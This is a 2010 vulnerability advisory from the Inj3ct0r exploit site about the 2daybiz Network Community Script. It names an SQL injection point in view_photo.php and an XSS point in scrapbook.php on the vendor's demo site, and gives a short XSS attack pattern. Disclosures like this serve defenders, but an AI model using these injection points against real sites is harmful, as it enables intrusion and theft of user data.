===========================================================
     2daybiz Network Community Script SQLi AND XSS Vulnerability
     ===========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name : 2daybiz Network Community Script SQLi AND XSS Vulnerability
Date : june, 16 2010
Vendor url :http://www.2daybiz.com/networkcommunityscript.html
Critical Level     : HIGH
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz 
#######################################################################################################
DESCRIPTION:
2daybiz Network Community Script has all the features needed to run a successful social networking community like Orkut. The features include 

customizing member profile, upload pictures, inviting friends to join their network, create groups with different access levels, chat in 

public or private rooms, and create forums, events, classifieds, and blog. Network Community Script makes it easy to find people who share 

their hobbies and interests, look for dating partners or to establish new business contacts. The user can also create and join a wide variety 

of online communities to discuss current events, reconnect with old friends or even exchange your favorite recipes. 


#######################################################################################################
Xploit: SQLI Vulnerability 

DEMO URL : http://2daybiz.com/products/orkutclone/view_photo.php?page=3&alb=[SQLI]
###############################################################################################################
Xploit: XSS Vulnerability 

Attack Pattern: '"-->
DEMO URL :http://2daybiz.com/products/orkutclone/scrapbook.php?id=[XSS]
###############################################################################################################
# 0day no more 
# Sid3^effects